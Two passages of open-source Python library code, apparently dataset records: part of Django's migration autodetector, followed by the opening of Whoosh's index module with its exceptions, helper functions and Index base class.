any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name_lower == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name_lower == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Field is removed and part of an index/unique_together
elif dependency[2] is not None and dependency[3] == "foo_together_change":
return (
isinstance(operation, (operations.AlterUniqueTogether,
operations.AlterIndexTogether)) and
operation.name_lower == dependency[1].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
def generate_renamed_models(self):
"""
Finds any renamed models, and generates the operations for them,
and removes the old entry from the model lists.
Must be run before other model-level generation.
"""
self.renamed_models = {}
self.renamed_models_rel = {}
added_models = set(self.new_model_keys) - set(self.old_model_keys)
for app_label, model_name in sorted(added_models):
model_state = self.to_state.models[app_label, model_name]
model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
removed_models = set(self.old_model_keys) - set(self.new_model_keys)
for rem_app_label, rem_model_name in removed_models:
if rem_app_label == app_label:
rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
if model_fields_def == rem_model_fields_def:
if self.questioner.ask_rename_model(rem_model_state, model_state):
self.add_operation(
app_label,
operations.RenameModel(
old_name=rem_model_state.name,
new_name=model_state.name,
)
)
self.renamed_models[app_label, model_name] = rem_model_name
self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
self.old_model_keys.remove((rem_app_label, rem_model_name))
self.old_model_keys.append((app_label, model_name))
break
def generate_created_models(self):
"""
Find all new models (both managed and unmanaged) and make create
operations for them as well as separate operations to create any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also defer any model options that refer to collections of fields
that might be deferred (e.g. unique_together, index_together).
"""
old_keys = set(self.old_model_keys).union(self.old_unmanaged_keys)
added_models = set(self.new_model_keys) - old_keys
added_unmanaged_models = set(self.new_unmanaged_keys) - old_keys
all_added_models = chain(
sorted(added_models, key=self.swappable_first_key, reverse=True),
sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
)
for app_label, model_name in all_added_models:
model_state = self.to_state.models[app_label, model_name]
model_opts = self.new_apps.get_model(app_label, model_name)._meta
# Gather related fields
related_fields = {}
primary_key_rel = None
for field in model_opts.local_fields:
if field.remote_field:
if field.remote_field.model:
if field.primary_key:
primary_key_rel = field.remote_field.model
elif not field.remote_field.parent_link:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
for field in model_opts.local_many_to_many:
if field.remote_field.model:
related_fields[field.name] = field
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
# Are there unique/index_together to defer?
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
# Depend on the deletion of any possible proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Depend on the other end of the primary key if it's a relation
if primary_key_rel:
dependencies.append((
primary_key_rel._meta.app_label,
primary_key_rel._meta.object_name,
None,
True
))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[d for d in model_state.fields if d[0] not in related_fields],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
dependencies=dependencies,
beginning=True,
)
# Don't add operations which modify the database for unmanaged models
if not model_opts.managed:
continue
# Generate operations for each related field
for name, field in sorted(related_fields.items()):
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.remote_field.model._meta.app_label
dep_object_name = field.remote_field.model._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
dependencies.append((
field.remote_field.through._meta.app_label,
field.remote_field.through._meta.object_name,
None,
True
))
# Depend on our own model being created
dependencies.append((app_label, model_name, None, True))
# Make operation
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=name,
field=field,
),
dependencies=list(set(dependencies)),
)
# Generate other opns
related_dependencies = [
(app_label, model_name, name, True)
for name, field in sorted(related_fields.items())
]
related_dependencies.append((app_label, model_name, None, True))
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=unique_together,
),
dependencies=related_dependencies
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=index_together,
),
dependencies=related_dependencies
)
if order_with_respect_to:
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=order_with_respect_to,
),
dependencies=[
(app_label, model_name, order_with_respect_to, True),
(app_label, model_name, None, True),
]
)
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
We use the same statements as that way there's less code duplication,
but of course for proxy models we can skip all that pointless field
stuff and just chuck out an operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy")
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
def generate_deleted_models(self):
"""
Find all deleted models (managed and unmanaged) and make delete
operations for them as well as separate operations to delete any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also bring forward removal of any model options that refer to
collections of fields - the inverse of generate_created_models().
"""
new_keys = set(self.new_model_keys).union(self.new_unmanaged_keys)
deleted_models = set(self.old_model_keys) - new_keys
deleted_unmanaged_models = set(self.old_unmanaged_keys) - new_keys
all_deleted_models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
for app_label, model_name in all_deleted_models:
model_state = self.from_state.models[app_label, model_name]
model = self.old_apps.get_model(app_label, model_name)
if not model._meta.managed:
# Skip here, no need to handle fields for unmanaged models
continue
# Gather related fields
related_fields = {}
for field in model._meta.local_fields:
if field.remote_field:
if field.remote_field.model:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
for field in model._meta.local_many_to_many:
if field.remote_field.model:
related_fields[field.name] = field
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
# Generate option removal first
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=None,
)
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=None,
)
)
# Then remove each related field
for name, field in sorted(related_fields.items()):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=name,
)
)
# Finally, remove the model.
# This depends on both the removal/alteration of all incoming fields
# and the removal of all its own related fields, and if it's
# a through model the field that references it.
dependencies = []
for related_object in model._meta.related_objects:
related_object_app_label = related_object.related_model._meta.app_label
object_name = related_object.related_model._meta.object_name
field_name = related_object.field.name
dependencies.append((related_object_app_label, object_name, field_name, False))
if not related_object.many_to_many:
dependencies.append((related_object_app_label, object_name, field_name, "alter"))
for name, field in sorted(related_fields.items()):
dependencies.append((app_label, model_name, name, False))
# We're referenced in another field's through=
through_user = self.through_users.get((app_label, model_state.name_lower))
if through_user:
dependencies.append((through_user[0], through_user[1], through_user[2], False))
# Finally, make the operation, deduping any dependencies
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
dependencies=list(set(dependencies)),
)
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy")
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
def generate_renamed_fields(self):
"""
Works out renamed fields
"""
self.renamed_fields = {}
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Scan to see if this is actually a rename!
field_dec = self.deep_deconstruct(field)
for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
if rem_app_label == app_label and rem_model_name == model_name:
old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
if field.remote_field and field.remote_field.model and 'to' in old_field_dec[2]:
old_rel_to = old_field_dec[2]['to']
if old_rel_to in self.renamed_models_rel:
old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
if old_field_dec == field_dec:
if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
self.add_operation(
app_label,
operations.RenameField(
model_name=model_name,
old_name=rem_field_name,
new_name=field_name,
)
)
self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
self.old_field_keys.add((app_label, model_name, field_name))
self.renamed_fields[app_label, model_name, field_name] = rem_field_name
break
def generate_added_fields(self):
"""
Fields that have been added
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
self._generate_added_field(app_label, model_name, field_name)
def _generate_added_field(self, app_label, model_name, field_name):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.remote_field and field.remote_field.model:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.remote_field.model._meta.app_label
dep_object_name = field.remote_field.model._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
dependencies.append((
field.remote_field.through._meta.app_label,
field.remote_field.through._meta.object_name,
None,
True,
))
# You can't just add NOT NULL fields with no default or fields
# which don't allow empty strings as default.
preserve_default = True
if (not field.null and not field.has_default() and
not isinstance(field, models.ManyToManyField) and
not (field.blank and field.empty_strings_allowed)):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
preserve_default = False
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self._generate_removed_field(app_label, model_name, field_name)
def _generate_removed_field(self, app_label, model_name, field_name):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an
# order_with_respect_to or index/unique_together operation;
# this is safely ignored if there isn't one
dependencies=[
(app_label, model_name, field_name, "order_wrt_unset"),
(app_label, model_name, field_name, "foo_together_change"),
],
)
def generate_altered_fields(self):
"""
Fields that have been altered.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
# Did the field change?
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(old_field_name)
new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Implement any model renames on relations; these are handled by RenameModel
# so we need to exclude them from the comparison
if hasattr(new_field, "remote_field") and getattr(new_field.remote_field, "model", None):
rename_key = (
new_field.remote_field.model._meta.app_label,
new_field.remote_field.model._meta.model_name,
)
if rename_key in self.renamed_models:
new_field.remote_field.model = old_field.remote_field.model
old_field_dec = self.deep_deconstruct(old_field)
new_field_dec = self.deep_deconstruct(new_field)
if old_field_dec != new_field_dec:
both_m2m = (
isinstance(old_field, models.ManyToManyField) and
isinstance(new_field, models.ManyToManyField)
)
neither_m2m = (
not isinstance(old_field, models.ManyToManyField) and
not isinstance(new_field, models.ManyToManyField)
)
if both_m2m or neither_m2m:
# Either both fields are m2m or neither is
preserve_default = True
if (old_field.null and not new_field.null and not new_field.has_default() and
not isinstance(new_field, models.ManyToManyField)):
field = new_field.clone()
new_default = self.questioner.ask_not_null_alteration(field_name, model_name)
if new_default is not models.NOT_PROVIDED:
field.default = new_default
preserve_default = False
else:
field = new_field
self.add_operation(
app_label,
operations.AlterField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
)
)
else:
# We cannot alter between m2m and concrete fields
self._generate_removed_field(app_label, model_name, field_name)
self._generate_added_field(app_label, model_name, field_name)
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = {
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
}
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
def generate_altered_unique_together(self):
self._generate_altered_foo_together(operations.AlterUniqueTogether)
def generate_altered_index_together(self):
self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_db_table(self):
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_db_table_name = old_model_state.options.get('db_table')
new_db_table_name = new_model_state.options.get('db_table')
if old_db_table_name != new_db_table_name:
self.add_operation(
app_label,
operations.AlterModelTable(
name=model_name,
table=new_db_table_name,
)
)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(
self.kept_proxy_keys
).union(
self.kept_unmanaged_keys
).union(
# unmanaged converted to managed
set(self.old_unmanaged_keys).intersection(self.new_model_keys)
).union(
# managed converted to unmanaged
set(self.old_model_keys).intersection(self.new_unmanaged_keys)
)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if (old_model_state.options.get("order_with_respect_to") !=
new_model_state.options.get("order_with_respect_to")):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to"):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to'),
),
dependencies=dependencies,
)
def generate_altered_managers(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.managers != new_model_state.managers:
self.add_operation(
app_label,
operations.AlterModelManagers(
name=model_name,
managers=new_model_state.managers,
)
)
def arrange_for_graph(self, changes, graph, migration_name=None):
"""
Takes in a result from changes() and a MigrationGraph,
and fixes the names and dependencies of the changes so they
extend the graph from the leaf nodes for each app.
"""
leaves = graph.leaf_nodes()
name_map = {}
for app_label, migrations in list(changes.items()):
if not migrations:
continue
# Find the app label's current leaf node
app_leaf = None
for leaf in leaves:
if leaf[0] == app_label:
app_leaf = leaf
break
# Do they want an initial migration for this app?
if app_leaf is None and not self.questioner.ask_initial(app_label):
# They don't.
for migration in migrations:
name_map[(app_label, migration.name)] = (app_label, "__first__")
del changes[app_label]
continue
# Work out the next number in the sequence
if app_leaf is None:
next_number = 1
else:
next_number = (self.parse_number(app_leaf[1]) or 0) + 1
# Name each migration
for i, migration in enumerate(migrations):
if i == 0 and app_leaf:
migration.dependencies.append(app_leaf)
if i == 0 and not app_leaf:
new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
else:
new_name = "%04i_%s" % (
next_number,
migration_name or self.suggest_name(migration.operations)[:100],
)
name_map[(app_label, migration.name)] = (app_label, new_name)
next_number += 1
migration.name = new_name
# Now fix dependencies
for app_label, migrations in changes.items():
for migration in migrations:
migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
but we put some effort in to the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name_lower
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name_lower
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name_lower for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
match = re.match(r'^\d+', name)
if match:
return int(match.group())
return None | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2007 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
"""Contains the main functions/classes for creating, maintaining, and using
an index.
"""
from __future__ import division
import os.path, re, sys
from time import time, sleep
from whoosh import __version__
from whoosh.legacy import toc_loaders
from whoosh.compat import pickle, string_type
from whoosh.fields import ensure_schema
from whoosh.system import _INT_SIZE, _FLOAT_SIZE, _LONG_SIZE
_DEF_INDEX_NAME = "MAIN"
_CURRENT_TOC_VERSION = -111
# Exceptions
class LockError(Exception):
pass
class IndexError(Exception):
"""Generic index error."""
class IndexVersionError(IndexError):
"""Raised when you try to open an index using a format that the current
version of Whoosh cannot read. That is, when the index you're trying to
open is either not backward or forward compatible with this version of
Whoosh.
"""
def __init__(self, msg, version, release=None):
Exception.__init__(self, msg)
self.version = version
self.release = release
class OutOfDateError(IndexError):
"""Raised when you try to commit changes to an index which is not the
latest generation.
"""
class EmptyIndexError(IndexError):
"""Raised when you try to work with an index that has no indexed terms.
"""
# Convenience functions
def create_in(dirname, schema, indexname=None):
"""Convenience function to create an index in a directory. Takes care of
creating a FileStorage object for you.
:param dirname: the path string of the directory in which to create the
index.
:param schema: a :class:`whoosh.fields.Schema` object describing the
index's fields.
:param indexname: the name of the index to create; you only need to specify
this if you are creating multiple indexes within the same storage
object.
:returns: :class:`Index`
"""
from whoosh.filedb.filestore import FileStorage
if not indexname:
indexname = _DEF_INDEX_NAME
storage = FileStorage(dirname)
return FileIndex.create(storage, schema, indexname)
def open_dir(dirname, indexname=None, readonly=False, schema=None):
"""Convenience function for opening an index in a directory. Takes care of
creating a FileStorage object for you. dirname is the filename of the
directory in containing the index. indexname is the name of the index to
create; you only need to specify this if you have multiple indexes within
the same storage object.
:param dirname: the path string of the directory in which to create the
index.
:param indexname: the name of the index to create; you only need to specify
this if you have multiple indexes within the same storage object.
"""
from whoosh.filedb.filestore import FileStorage
if indexname is None:
indexname = _DEF_INDEX_NAME
storage = FileStorage(dirname, readonly=readonly)
return FileIndex(storage, schema=schema, indexname=indexname)
def exists_in(dirname, indexname=None):
"""Returns True if dirname contains a Whoosh index.
:param dirname: the file path of a directory.
:param indexname: the name of the index. If None, the default index name is
used.
"""
if os.path.exists(dirname):
try:
ix = open_dir(dirname, indexname=indexname)
return ix.latest_generation() > -1
except EmptyIndexError:
pass
return False
def exists(storage, indexname=None):
"""Deprecated; use ``storage.index_exists()``.
:param storage: a store.Storage object.
:param indexname: the name of the index. If None, the default index name is
used.
"""
return storage.index_exists(indexname)
def version_in(dirname, indexname=None):
"""Returns a tuple of (release_version, format_version), where
release_version is the release version number of the Whoosh code that
created the index -- e.g. (0, 1, 24) -- and format_version is the version
number of the on-disk format used for the index -- e.g. -102.
You should avoid attaching significance to the second number (the index
version). This is simply a version number for the TOC file and probably
should not have been exposed in a public interface. The best way to check
if the current version of Whoosh can open an index is to actually try to
open it and see if it raises a ``whoosh.index.IndexVersionError`` exception.
Note that the release and format version are available as attributes on the
Index object in Index.release and Index.version.
:param dirname: the file path of a directory containing an index.
:param indexname: the name of the index. If None, the default index name is
used.
:returns: ((major_ver, minor_ver, build_ver), format_ver)
"""
from whoosh.filedb.filestore import FileStorage
storage = FileStorage(dirname)
return version(storage, indexname=indexname)
def version(storage, indexname=None):
"""Returns a tuple of (release_version, format_version), where
release_version is the release version number of the Whoosh code that
created the index -- e.g. (0, 1, 24) -- and format_version is the version
number of the on-disk format used for the index -- e.g. -102.
You should avoid attaching significance to the second number (the index
version). This is simply a version number for the TOC file and probably
should not have been exposed in a public interface. The best way to check
if the current version of Whoosh can open an index is to actually try to
open it and see if it raises a ``whoosh.index.IndexVersionError`` exception.
Note that the release and format version are available as attributes on the
Index object in Index.release and Index.version.
:param storage: a store.Storage object.
:param indexname: the name of the index. If None, the default index name is
used.
:returns: ((major_ver, minor_ver, build_ver), format_ver)
"""
try:
if indexname is None:
indexname = _DEF_INDEX_NAME
ix = storage.open_index(indexname)
return (ix.release, ix.version)
except IndexVersionError:
e = sys.exc_info()[1]
return (None, e.version)
# Index base class
class Index(object):
"""Represents an indexed collection of documents.
"""
def close(self):
"""Closes any open resources held by the Index object itself. This may
not close all resources being used everywhere, for example by a
Searcher object.
"""
pass
def add_field(self, fieldname, fieldspec):
"""Adds a field to the index's schema.
:param fieldname: the name of the field to add.
:param fieldspec: an instantiated :class:`whoosh.fields.FieldType`
object.
"""
w = self.writer()
w.add_field(fieldname, fieldspec)
w.commit()
def remove_field(self, fieldname):
"""Removes the named field from the index's schema. Depending on the
backend implementation, this may or may not actually remove existing
data for the field from the index. Optimizing the index should always
clear out existing data for a removed field.
"""
w = self.writer()
w.remove_field(fieldname)
w.commit()
def latest_generation(self):
"""Returns the generation number of the latest generation of this
index, or -1 if the backend doesn't support versioning.
"""
return -1
def refresh(self):
"""Returns a new Index object representing the latest generation
of this index (if this object is the latest generation, or the backend
doesn't support versioning, returns self).
:returns: :class:`Index`
"""
return self
def up_to_date(self):
"""Returns True if this object represents the latest generation of
this index. Returns False if this object is not the latest generation
(that is, someone else has updated the index since you opened this
object).
"""
return True
def last_modified(self):
"""Returns the last modified time of the index, or -1 if the backend
doesn't support last-modified times.
"""
return -1
def is_empty(self):
"""Returns True if this index is empty (that is, it has never had any
documents successfully written to it.
"""
raise NotImplementedError
def optimize(self):
"""Optimizes this index, if necessary.
"""
pass
def doc_count_all(self):
"""Returns the total number of documents, DELETED OR UNDELETED,
in this index.
"""
r = self.reader()
try:
return r.doc_count_all()
finally:
r.close()
def doc_count(self):
"""Returns the total number of UNDELETED documents in this index.
"""
r = self.reader()
try:
return r.doc_count()
finally:
r.close()
def searcher(self, **kwargs):
"""Returns a Searcher object for this index. Keyword arguments are
passed to the Searcher object's constructor.
:rtype: :class:`whoosh.searching.Searcher`
"""
from whoosh.searching import Searcher
return Searcher(self.reader(), fromindex=self, **kwargs)
def field_length(self, fieldname):
"""Returns the total length of the field across all documents.
"""
r = self.reader()
try:
return r.field_length(fieldname)
finally:
r.close()
def max_field_length(self, fieldname):
"""Returns the maximum length of the field across all documents.
"""
r = self.reader()
try:
return r.max_field_length(fieldname)
finally:
r.close()
def reader(self, reuse=None):
"""Returns an IndexReader object for this index.
:param reuse: an existing reader. Some implementations may recycle
resources from this existing reader to create the new reader. Note
that any resources in the "recycled" reader that are not used by
the new reader will be CLOSED, so you CANNOT use it afterward.
:rtype: :class:`whoosh.reading.IndexReader`
"""
raise NotImplementedError
def writer(self, **kwargs):
"""Returns an IndexWriter object for this index.
:rtype: :class:`whoosh.writing.IndexWriter`
"""
raise NotImplementedError
def delete_by_term(self, fieldname, text, searcher=None):
w = self.writer()
w.delete_by_term(fieldname, text, searcher=searcher)
w.commit()
def delete_by_query(self, q, searcher=None):
w = self.writer()
w.delete_by_query(q, searcher=searcher)
w.commit()
# Codec-based index implementation
def clean_files(storage, indexname, gen, segments):
# Attempts to remove unused index files (called when a new generation
# is created). If existing Index and/or reader objects have the files
# open, they may not be deleted immediately (i.e. on Windows) but will
# probably be deleted eventually by a later call to clean_files.
current_segment_names = set(s.segment_id() for s in segments)
tocpattern = TOC._pattern(indexname)
segpattern = TOC._segment_pattern(indexname)
todelete = set()
for filename in storage:
if filename.startswith("."):
continue
tocm = tocpattern.match(filename)
segm = segpattern.match(filename)
if tocm:
if int(tocm.group(1)) != gen:
todelete.add(filename)
